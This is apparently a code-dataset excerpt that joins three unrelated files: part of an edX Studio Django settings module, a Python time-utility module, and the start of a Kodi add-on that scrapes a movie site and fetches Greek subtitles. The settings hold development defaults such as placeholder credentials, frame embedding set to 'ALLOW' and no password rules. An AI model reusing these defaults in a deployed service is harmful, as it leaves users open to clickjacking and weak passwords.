LMS_BASE = None
#################### CAPA External Code Evaluation #############################
XQUEUE_INTERFACE = {
'url': 'http://localhost:8888',
'django_auth': {'username': 'local',
'password': 'local'},
'basic_auth': None,
}
################################# Middleware ###################################
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'staticfiles.finders.FileSystemFinder',
'staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'request_cache.middleware.RequestCache',
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'method_override.middleware.MethodOverrideMiddleware',
# Instead of AuthenticationMiddleware, we use a cache-backed version
'cache_toolbox.middleware.CacheBackedAuthenticationMiddleware',
'student.middleware.UserStandingMiddleware',
'contentserver.middleware.StaticContentServer',
'crum.CurrentRequestUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'track.middleware.TrackMiddleware',
# Allows us to dark-launch particular languages
'dark_lang.middleware.DarkLangMiddleware',
'embargo.middleware.EmbargoMiddleware',
# Detects user-requested locale from 'accept-language' header in http request
'django.middleware.locale.LocaleMiddleware',
'django.middleware.transaction.TransactionMiddleware',
# needs to run after locale middleware (or anything that modifies the request context)
'edxmako.middleware.MakoMiddleware',
# catches any uncaught RateLimitExceptions and returns a 403 instead of a 500
'ratelimitbackend.middleware.RateLimitMiddleware',
# for expiring inactive sessions
'session_inactivity_timeout.middleware.SessionInactivityTimeout',
# use Django built in clickjacking protection
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# Clickjacking protection can be enabled by setting this to 'DENY'
X_FRAME_OPTIONS = 'ALLOW'
############# XBlock Configuration ##########
# Import after sys.path fixup
from xmodule.modulestore.inheritance import InheritanceMixin
from xmodule.modulestore import prefer_xmodules
from xmodule.x_module import XModuleMixin
# This should be moved into an XBlock Runtime/Application object
# once the responsibility of XBlock creation is moved out of modulestore - cpennington
XBLOCK_MIXINS = (LmsBlockMixin, CmsBlockMixin, InheritanceMixin, XModuleMixin)
# Allow any XBlock in Studio
# You should also enable the ALLOW_ALL_ADVANCED_COMPONENTS feature flag, so that
# xblocks can be added via advanced settings
XBLOCK_SELECT_FUNCTION = prefer_xmodules
############################ DJANGO_BUILTINS ################################
# Change DEBUG/TEMPLATE_DEBUG in your environment settings files, not here
DEBUG = False
TEMPLATE_DEBUG = False
# Site info
SITE_ID = 1
SITE_NAME = "localhost:8001"
HTTPS = 'on'
ROOT_URLCONF = 'cms.urls'
# Email
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_USE_TLS = False
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
DEFAULT_FROM_EMAIL = '[email protected]'
DEFAULT_FEEDBACK_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
ADMINS = ()
MANAGERS = ADMINS
# Static content
STATIC_URL = '/static/' + git.revision + "/"
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ENV_ROOT / "staticfiles" / git.revision
STATICFILES_DIRS = [
COMMON_ROOT / "static",
PROJECT_ROOT / "static",
LMS_ROOT / "static",
# This is how you would use the textbook images locally
# ("book", ENV_ROOT / "book_images"),
]
# Locale/Internationalization
TIME_ZONE = 'America/New_York' # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
LANGUAGE_CODE = 'en' # http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGES = lms.envs.common.LANGUAGES
USE_I18N = True
USE_L10N = True
# Localization strings (e.g. django.po) are under this directory
LOCALE_PATHS = (REPO_ROOT + '/conf/locale',) # edx-platform/conf/locale/
# Messages
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
############################### Pipeline #######################################
STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'
from rooted_paths import rooted_glob
PIPELINE_CSS = {
'style-vendor': {
'source_filenames': [
'css/vendor/normalize.css',
'css/vendor/font-awesome.css',
'css/vendor/html5-input-polyfills/number-polyfill.css',
'js/vendor/CodeMirror/codemirror.css',
'css/vendor/ui-lightness/jquery-ui-1.8.22.custom.css',
'css/vendor/jquery.qtip.min.css',
'js/vendor/markitup/skins/simple/style.css',
'js/vendor/markitup/sets/wiki/style.css',
],
'output_filename': 'css/cms-style-vendor.css',
},
'style-vendor-tinymce-content': {
'source_filenames': [
'css/tinymce-studio-content-fonts.css',
'js/vendor/tinymce/js/tinymce/skins/studio-tmce4/content.min.css',
'css/tinymce-studio-content.css'
],
'output_filename': 'css/cms-style-vendor-tinymce-content.css',
},
'style-vendor-tinymce-skin': {
'source_filenames': [
'js/vendor/tinymce/js/tinymce/skins/studio-tmce4/skin.min.css'
],
'output_filename': 'css/cms-style-vendor-tinymce-skin.css',
},
'style-app': {
'source_filenames': [
'sass/style-app.css',
],
'output_filename': 'css/cms-style-app.css',
},
'style-app-extend1': {
'source_filenames': [
'sass/style-app-extend1.css',
],
'output_filename': 'css/cms-style-app-extend1.css',
},
'style-xmodule': {
'source_filenames': [
'sass/style-xmodule.css',
],
'output_filename': 'css/cms-style-xmodule.css',
},
}
# test_order: Determines the position of this chunk of javascript on
# the jasmine test page
PIPELINE_JS = {
'module-js': {
'source_filenames': (
rooted_glob(COMMON_ROOT / 'static/', 'xmodule/descriptors/js/*.js') +
rooted_glob(COMMON_ROOT / 'static/', 'xmodule/modules/js/*.js') +
rooted_glob(COMMON_ROOT / 'static/', 'coffee/src/discussion/*.js')
),
'output_filename': 'js/cms-modules.js',
'test_order': 1
},
}
PIPELINE_COMPILERS = (
'pipeline.compilers.coffee.CoffeeScriptCompiler',
)
PIPELINE_CSS_COMPRESSOR = None
PIPELINE_JS_COMPRESSOR = None
STATICFILES_IGNORE_PATTERNS = (
"*.py",
"*.pyc"
# it would be nice if we could do, for example, "**/*.scss",
# but these strings get passed down to the `fnmatch` module,
# which doesn't support that. :(
# http://docs.python.org/2/library/fnmatch.html
"sass/*.scss",
"sass/*/*.scss",
"sass/*/*/*.scss",
"sass/*/*/*/*.scss",
"coffee/*.coffee",
"coffee/*/*.coffee",
"coffee/*/*/*.coffee",
"coffee/*/*/*/*.coffee",
# Symlinks used by js-test-tool
"xmodule_js",
"common_static",
)
PIPELINE_YUI_BINARY = 'yui-compressor'
################################# CELERY ######################################
# Message configuration
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_MESSAGE_COMPRESSION = 'gzip'
# Results configuration
CELERY_IGNORE_RESULT = False
CELERY_STORE_ERRORS_EVEN_IF_IGNORED = True
# Events configuration
CELERY_TRACK_STARTED = True
CELERY_SEND_EVENTS = True
CELERY_SEND_TASK_SENT_EVENT = True
# Exchange configuration
CELERY_DEFAULT_EXCHANGE = 'edx.core'
CELERY_DEFAULT_EXCHANGE_TYPE = 'direct'
# Queues configuration
HIGH_PRIORITY_QUEUE = 'edx.core.high'
DEFAULT_PRIORITY_QUEUE = 'edx.core.default'
LOW_PRIORITY_QUEUE = 'edx.core.low'
CELERY_QUEUE_HA_POLICY = 'all'
CELERY_CREATE_MISSING_QUEUES = True
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
############################## Video ##########################################
YOUTUBE = {
# YouTube JavaScript API
'API': 'www.youtube.com/iframe_api',
# URL to test YouTube availability
'TEST_URL': 'gdata.youtube.com/feeds/api/videos/',
# Current youtube api for requesting transcripts.
# For example: http://video.google.com/timedtext?lang=en&v=j_jEn79vS3g.
'TEXT_API': {
'url': 'video.google.com/timedtext',
'params': {
'lang': 'en',
'v': 'set_youtube_id_of_11_symbols_here',
},
},
}
############################ APPS #####################################
INSTALLED_APPS = (
# Standard apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'djcelery',
'south',
'method_override',
# Database-backed configuration
'config_models',
# Monitor the status of services
'service_status',
# Testing
'django_nose',
# For CMS
'contentstore',
'course_creators',
'student', # misleading name due to sharing with lms
'course_groups', # not used in cms (yet), but tests run
# Tracking
'track',
'eventtracking.django',
# Monitoring
'datadog',
# For asset pipelining
'edxmako',
'pipeline',
'staticfiles',
'static_replace',
# comment common
'django_comment_common',
# for course creator table
'django.contrib.admin',
# for managing course modes
'course_modes',
# Dark-launching languages
'dark_lang',
# Student identity reverification
'reverification',
# User preferences
'user_api',
'django_openid_auth',
'embargo',
# Monitoring signals
'monitoring',
)
################# EDX MARKETING SITE ##################################
EDXMKTG_COOKIE_NAME = 'edxloggedin'
MKTG_URLS = {}
MKTG_URL_LINK_MAP = {
}
COURSES_WITH_UNSAFE_CODE = []
############################## EVENT TRACKING #################################
TRACK_MAX_EVENT = 50000
TRACKING_BACKENDS = {
'logger': {
'ENGINE': 'track.backends.logger.LoggerBackend',
'OPTIONS': {
'name': 'tracking'
}
}
}
# We're already logging events, and we don't want to capture user
# names/passwords. Heartbeat events are likely not interesting.
TRACKING_IGNORE_URL_PATTERNS = [r'^/event', r'^/login', r'^/heartbeat']
EVENT_TRACKING_ENABLED = True
EVENT_TRACKING_BACKENDS = {
'logger': {
'ENGINE': 'eventtracking.backends.logger.LoggerBackend',
'OPTIONS': {
'name': 'tracking',
'max_event_size': TRACK_MAX_EVENT,
}
}
}
EVENT_TRACKING_PROCESSORS = [
{
'ENGINE': 'track.shim.LegacyFieldMappingProcessor'
}
]
#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = None
PASSWORD_MAX_LENGTH = None
PASSWORD_COMPLEXITY = {}
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = None
PASSWORD_DICTIONARY = []
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = 5
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = 15 * 60
### Apps only installed in some instances
OPTIONAL_APPS = (
'edx_jsdraw',
'mentoring',
# edx-ora2
'submissions',
'openassessment',
'openassessment.assessment',
'openassessment.workflow',
'openassessment.xblock'
)
for app_name in OPTIONAL_APPS:
# First attempt to only find the module rather than actually importing it,
# to avoid circular references - only try to import if it can't be found
# by find_module, which doesn't work with import hooks
try:
imp.find_module(app_name)
except ImportError:
try:
__import__(app_name)
except ImportError:
continue
INSTALLED_APPS += (app_name,)
### ADVANCED_SECURITY_CONFIG
# Empty by default
ADVANCED_SECURITY_CONFIG = {}
| agpl-3.0 | -6,069,792,571,519,737,000 | 28.319936 | 104 | 0.659264 | false |
Jackeriss/Typora-Blog | app/util/time_util.py | 1 | 3493 | import asyncio  # needed by timeout_log below
import functools
import locale  # needed by datetime2str below
import logging
import time
from datetime import datetime
import pytz
from app.util.config_util import config
def str2datetime(value, default=None, time_format="%Y-%m-%d %H:%M:%S"):
try:
return datetime.strptime(value, time_format)
except Exception as exception:
logging.exception(f"str2datetime failed!value:{value} exception:{exception}")
return default
def time_str2timestamp(time_str):
if ":" in time_str:
if "/" in time_str:
return (
time_str.split("/")[0],
time.mktime(
datetime.strptime(time_str, "%Y/%m/%d %H:%M:%S").timetuple()
),
)
return (
time_str.split("-")[0],
time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S").timetuple()),
)
elif "/" in time_str:
return (
time_str.split("/")[0],
time.mktime(datetime.strptime(time_str, "%Y/%m/%d %H-%M-%S").timetuple()),
)
else:
return (
time_str.split("-")[0],
time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H-%M-%S").timetuple()),
)
def str2timestamp(value, default=0, time_format="%Y-%m-%d %H:%M:%S"):
try:
return datetime.strptime(value, time_format).timestamp() * 1000
except Exception as exception:
logging.exception(f"str2timestamp failed!value:{value} exception:{exception}")
return default
def timestamp2str(value, time_format="%Y-%m-%d %H:%M:%S"):
if not value:
return ""
try:
return datetime.fromtimestamp(value, pytz.UTC).strftime(time_format)
except Exception as exception:
logging.exception(f"timestamp2str failed!value:{value} exception:{exception}")
return ""
def datetime2str(value, default="", time_format="%Y-%m-%d %H:%M:%S"):
if not isinstance(value, datetime):
return default
try:
locale.setlocale(locale.LC_TIME, "en_US.UTF-8")
return value.strftime(time_format)
except Exception as exception:
logging.exception(f"datetime2str failed!value:{value} exception:{exception}")
return default
def timestamp():
""" 获取当前utc时间戳 """
return int(datetime.utcnow().timestamp())
def now():
""" 获取当前utc时间 """
return datetime.utcnow()
def timeout_log(timeout=10, tag="", debug=False):
""" 记录函数执行时间
timeout: 超过时长打印错误日志,单位(秒)
tag: 日志记录标签
"""
def decorator(func):
def _time_log(time_start, time_end, function_name):
if not debug and config.server["debug"]:
return
cost = (time_end - time_start).total_seconds()
if cost > timeout:
logging.error(f"TIME OUT:{tag}, function:{function_name}, cost:{cost}s")
@functools.wraps(func)
async def _async_wrapper(*args, **kwargs):
start = now()
result = await func(*args, **kwargs)
_time_log(start, now(), func.__name__)
return result
@functools.wraps(func)
def _sync_wrapper(*args, **kwargs):
start = now()
result = func(*args, **kwargs)
_time_log(start, now(), func.__name__)
return result
if asyncio.iscoroutinefunction(func):
return _async_wrapper
return _sync_wrapper
return decorator
| mit | 6,112,573,830,291,964,000 | 28.626087 | 88 | 0.57059 | false |
SMALLplayer/smallplayer-image-creator | storage/.xbmc/addons/plugin.video.muchmovies.hd/default.py | 1 | 51620 | # -*- coding: utf-8 -*-
'''
Much Movies HD XBMC Addon
Copyright (C) 2014 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib,urllib2,re,os,threading,datetime,xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
from operator import itemgetter
try: import json
except: import simplejson as json
try: import CommonFunctions
except: import commonfunctionsdummy as CommonFunctions
from metahandler import metahandlers
from metahandler import metacontainers
language = xbmcaddon.Addon().getLocalizedString
setSetting = xbmcaddon.Addon().setSetting
getSetting = xbmcaddon.Addon().getSetting
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonDesc = language(30450).encode("utf-8")
addonIcon = os.path.join(addonPath,'icon.png')
addonFanart = os.path.join(addonPath,'fanart.jpg')
addonArt = os.path.join(addonPath,'resources/art')
addonDownloads = os.path.join(addonPath,'resources/art/Downloads.png')
addonPages = os.path.join(addonPath,'resources/art/Pages.png')
addonNext = os.path.join(addonPath,'resources/art/Next.png')
dataPath = xbmc.translatePath('special://profile/addon_data/%s' % (addonId))
viewData = os.path.join(dataPath,'views.cfg')
favData = os.path.join(dataPath,'favourites.cfg')
metaget = metahandlers.MetaData(preparezip=False)
common = CommonFunctions
action = None
class main:
def __init__(self):
global action
index().container_data()
params = {}
splitparams = sys.argv[2][sys.argv[2].find('?') + 1:].split('&')
for param in splitparams:
if (len(param) > 0):
splitparam = param.split('=')
key = splitparam[0]
try: value = splitparam[1].encode("utf-8")
except: value = splitparam[1]
params[key] = value
try: action = urllib.unquote_plus(params["action"])
except: action = None
try: name = urllib.unquote_plus(params["name"])
except: name = None
try: url = urllib.unquote_plus(params["url"])
except: url = None
try: image = urllib.unquote_plus(params["image"])
except: image = None
try: query = urllib.unquote_plus(params["query"])
except: query = None
try: title = urllib.unquote_plus(params["title"])
except: title = None
try: year = urllib.unquote_plus(params["year"])
except: year = None
try: imdb = urllib.unquote_plus(params["imdb"])
except: imdb = None
if action == None: root().get()
elif action == 'item_play': contextMenu().item_play()
elif action == 'item_random_play': contextMenu().item_random_play()
elif action == 'item_queue': contextMenu().item_queue()
elif action == 'favourite_add': contextMenu().favourite_add(favData, name, url, image, imdb)
elif action == 'favourite_from_search': contextMenu().favourite_from_search(favData, name, url, image, imdb)
elif action == 'favourite_delete': contextMenu().favourite_delete(favData, name, url)
elif action == 'favourite_moveUp': contextMenu().favourite_moveUp(favData, name, url)
elif action == 'favourite_moveDown': contextMenu().favourite_moveDown(favData, name, url)
elif action == 'playlist_open': contextMenu().playlist_open()
elif action == 'settings_open': contextMenu().settings_open()
elif action == 'addon_home': contextMenu().addon_home()
elif action == 'view_movies': contextMenu().view('movies')
elif action == 'metadata_movies': contextMenu().metadata('movie', name, url, imdb, '', '')
elif action == 'metadata_movies2': contextMenu().metadata('movie', name, url, imdb, '', '')
elif action == 'playcount_movies': contextMenu().playcount('movie', imdb, '', '')
elif action == 'library': contextMenu().library(name, url)
elif action == 'download': contextMenu().download(name, url)
elif action == 'trailer': contextMenu().trailer(name, url)
elif action == 'movies': movies().muchmovies(url)
elif action == 'movies_title': movies().muchmovies_title()
elif action == 'movies_release': movies().muchmovies_release()
elif action == 'movies_added': movies().muchmovies_added()
elif action == 'movies_rating': movies().muchmovies_rating()
elif action == 'movies_search': movies().muchmovies_search(query)
elif action == 'movies_favourites': favourites().movies()
elif action == 'pages_movies': pages().muchmovies()
elif action == 'genres_movies': genres().muchmovies()
elif action == 'play': resolver().run(url, name)
if action is None:
pass
elif action.startswith('movies'):
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
index().container_view('movies', {'skin.confluence' : 500})
xbmcplugin.setPluginFanart(int(sys.argv[1]), addonFanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
return
class getUrl(object):
def __init__(self, url, fetch=True, close=True, cookie=False, mobile=False, proxy=None, post=None, referer=None):
if not proxy is None:
proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
opener = urllib2.install_opener(opener)
if cookie == True:
import cookielib
cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
opener = urllib2.install_opener(opener)
if not post is None:
request = urllib2.Request(url, post)
else:
request = urllib2.Request(url,None)
if mobile == True:
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
else:
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
if not referer is None:
request.add_header('Referer', referer)
response = urllib2.urlopen(request, timeout=30)
if fetch == True:
result = response.read()
else:
result = response.geturl()
if close == True:
response.close()
self.result = result
class uniqueList(object):
def __init__(self, list):
uniqueSet = set()
uniqueList = []
for n in list:
if n not in uniqueSet:
uniqueSet.add(n)
uniqueList.append(n)
self.list = uniqueList
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
class player(xbmc.Player):
def __init__ (self):
self.property = addonName+'player_status'
xbmc.Player.__init__(self)
def status(self):
getProperty = index().getProperty(self.property)
index().clearProperty(self.property)
if not xbmc.getInfoLabel('Container.FolderPath') == '': return
if getProperty == 'true': return True
return
def run(self, name, url, imdb='0'):
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
else:
try:
file = name + '.strm'
file = file.translate(None, '\/:*?"<>|')
meta = xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.GetMovies", "params": {"properties" : ["title", "genre", "year", "rating", "director", "trailer", "tagline", "plot", "plotoutline", "originaltitle", "lastplayed", "playcount", "writer", "studio", "mpaa", "country", "imdbnumber", "runtime", "votes", "fanart", "thumbnail", "file", "sorttitle", "resume", "dateadded"]}, "id": 1}')
meta = unicode(meta, 'utf-8', errors='ignore')
meta = json.loads(meta)
meta = meta['result']['movies']
self.meta = [i for i in meta if i['file'].endswith(file)][0]
meta = {'title': self.meta['title'], 'originaltitle': self.meta['originaltitle'], 'year': self.meta['year'], 'genre': str(self.meta['genre']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'director': str(self.meta['director']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'country': str(self.meta['country']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'rating': self.meta['rating'], 'votes': self.meta['votes'], 'mpaa': self.meta['mpaa'], 'duration': self.meta['runtime'], 'trailer': self.meta['trailer'], 'writer': str(self.meta['writer']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'studio': str(self.meta['studio']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'tagline': self.meta['tagline'], 'plotoutline': self.meta['plotoutline'], 'plot': self.meta['plot']}
poster = self.meta['thumbnail']
except:
meta = {'label' : name, 'title' : name}
poster = ''
item = xbmcgui.ListItem(path=url, iconImage="DefaultVideo.png", thumbnailImage=poster)
item.setInfo( type="Video", infoLabels= meta )
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
for i in range(1, 21):
try: self.totalTime = self.getTotalTime()
except: self.totalTime = 0
            if not self.totalTime == 0: break  # duration known, stop waiting
xbmc.sleep(1000)
if self.totalTime == 0: return
subtitles().get(name)
self.content = 'movie'
self.season = str(xbmc.getInfoLabel('VideoPlayer.season'))
self.episode = str(xbmc.getInfoLabel('VideoPlayer.episode'))
if imdb == '0': imdb = metaget.get_meta('movie', xbmc.getInfoLabel('VideoPlayer.title') ,year=str(xbmc.getInfoLabel('VideoPlayer.year')))['imdb_id']
imdb = re.sub("[^0-9]", "", imdb)
self.imdb = imdb
while True:
try: self.currentTime = self.getTime()
except: break
xbmc.sleep(1000)
def onPlayBackEnded(self):
if xbmc.getInfoLabel('Container.FolderPath') == '': index().setProperty(self.property, 'true')
if not self.currentTime / self.totalTime >= .9: return
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
index().container_refresh()
else:
try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
except: pass
def onPlayBackStopped(self):
index().clearProperty(self.property)
if not self.currentTime / self.totalTime >= .9: return
if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
index().container_refresh()
else:
try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
except: pass
class subtitles:
def get(self, name):
subs = getSetting("subs")
if subs == '1': self.greek(name)
def greek(self, name):
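        # Flow summary (added comment): search greeksubtitles.info for the
        # title, download candidate packs via findsubtitles.eu, extract the
        # first valid ZIP, then feed the .srt/.sub file to the player.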
try:
import shutil, zipfile, time
sub_tmp = os.path.join(dataPath,'sub_tmp')
sub_tmp2 = os.path.join(sub_tmp, "subs")
sub_stream = os.path.join(dataPath,'sub_stream')
sub_file = os.path.join(sub_tmp, 'sub_tmp.zip')
try: os.makedirs(dataPath)
except: pass
try: os.remove(sub_tmp)
except: pass
try: shutil.rmtree(sub_tmp)
except: pass
try: os.makedirs(sub_tmp)
except: pass
try: os.remove(sub_stream)
except: pass
try: shutil.rmtree(sub_stream)
except: pass
try: os.makedirs(sub_stream)
except: pass
subtitles = []
query = ''.join(e for e in name if e.isalnum() or e == ' ')
query = urllib.quote_plus(query)
url = 'http://www.greeksubtitles.info/search.php?name=' + query
result = getUrl(url).result
result = result.decode('iso-8859-7').encode('utf-8')
result = result.lower().replace('"',"'")
match = "get_greek_subtitles[.]php[?]id=(.+?)'.+?%s.+?<"
quality = ['bluray', 'brrip', 'bdrip', 'dvdrip', 'hdtv']
for q in quality:
subtitles += re.compile(match % q).findall(result)
if subtitles == []: raise Exception()
for subtitle in subtitles:
url = 'http://www.findsubtitles.eu/getp.php?id=' + subtitle
response = urllib.urlopen(url)
content = response.read()
response.close()
                if content[:2] == 'PK': break  # ZIP magic is 2 bytes; [:4] could never equal 'PK'
file = open(sub_file, 'wb')
file.write(content)
file.close()
file = zipfile.ZipFile(sub_file, 'r')
file.extractall(sub_tmp)
file.close()
files = os.listdir(sub_tmp2)
if files == []: raise Exception()
file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')]
if file == []:
pack = [i for i in files if i.endswith('.zip') or i.endswith('.rar')]
pack = os.path.join(sub_tmp2, pack[0])
xbmc.executebuiltin('Extract("%s","%s")' % (pack, sub_tmp2))
time.sleep(1)
files = os.listdir(sub_tmp2)
file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')][0]
copy = os.path.join(sub_tmp2, file)
shutil.copy(copy, sub_stream)
try: shutil.rmtree(sub_tmp)
except: pass
file = os.path.join(sub_stream, file)
if not os.path.isfile(file): raise Exception()
xbmc.Player().setSubtitles(file)
except:
try: shutil.rmtree(sub_tmp)
except: pass
try: shutil.rmtree(sub_stream)
except: pass
index().infoDialog(language(30317).encode("utf-8"), name)
return
class index:
def infoDialog(self, str, header=addonName):
try: xbmcgui.Dialog().notification(header, str, addonIcon, 3000, sound=False)
except: xbmc.executebuiltin("Notification(%s,%s, 3000, %s)" % (header, str, addonIcon))
def okDialog(self, str1, str2, header=addonName):
xbmcgui.Dialog().ok(header, str1, str2)
def selectDialog(self, list, header=addonName):
select = xbmcgui.Dialog().select(header, list)
return select
def yesnoDialog(self, str1, str2, header=addonName):
answer = xbmcgui.Dialog().yesno(header, str1, str2)
return answer
def getProperty(self, str):
property = xbmcgui.Window(10000).getProperty(str)
return property
def setProperty(self, str1, str2):
xbmcgui.Window(10000).setProperty(str1, str2)
def clearProperty(self, str):
xbmcgui.Window(10000).clearProperty(str)
def addon_status(self, id):
check = xbmcaddon.Addon(id=id).getAddonInfo("name")
if not check == addonName: return True
def container_refresh(self):
xbmc.executebuiltin("Container.Refresh")
def container_data(self):
if not xbmcvfs.exists(dataPath):
xbmcvfs.mkdir(dataPath)
if not xbmcvfs.exists(favData):
file = xbmcvfs.File(favData, 'w')
file.write('')
file.close()
if not xbmcvfs.exists(viewData):
file = xbmcvfs.File(viewData, 'w')
file.write('')
file.close()
def container_view(self, content, viewDict):
try:
skin = xbmc.getSkinDir()
file = xbmcvfs.File(viewData)
read = file.read().replace('\n','')
file.close()
view = re.compile('"%s"[|]"%s"[|]"(.+?)"' % (skin, content)).findall(read)[0]
xbmc.executebuiltin('Container.SetViewMode(%s)' % str(view))
except:
try:
id = str(viewDict[skin])
xbmc.executebuiltin('Container.SetViewMode(%s)' % id)
except:
pass
def rootList(self, rootList):
total = len(rootList)
for i in rootList:
try:
name = language(i['name']).encode("utf-8")
image = '%s/%s' % (addonArt, i['image'])
action = i['action']
u = '%s?action=%s' % (sys.argv[0], action)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
except:
pass
def pageList(self, pageList):
if pageList == None: return
total = len(pageList)
for i in pageList:
try:
name, url, image = i['name'], i['url'], i['image']
sysname, sysurl, sysimage = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image)
u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
except:
pass
def nextList(self, nextList):
try: next = nextList[0]['next']
except: return
if next == '': return
name, url, image = language(30361).encode("utf-8"), next, addonNext
sysurl = urllib.quote_plus(url)
u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)
def downloadList(self):
u = getSetting("downloads")
if u == '': return
name, image = language(30363).encode("utf-8"), addonDownloads
item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
item.setProperty("Fanart_Image", addonFanart)
item.addContextMenuItems([], replaceItems=False)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)
def movieList(self, movieList):
if movieList == None: return
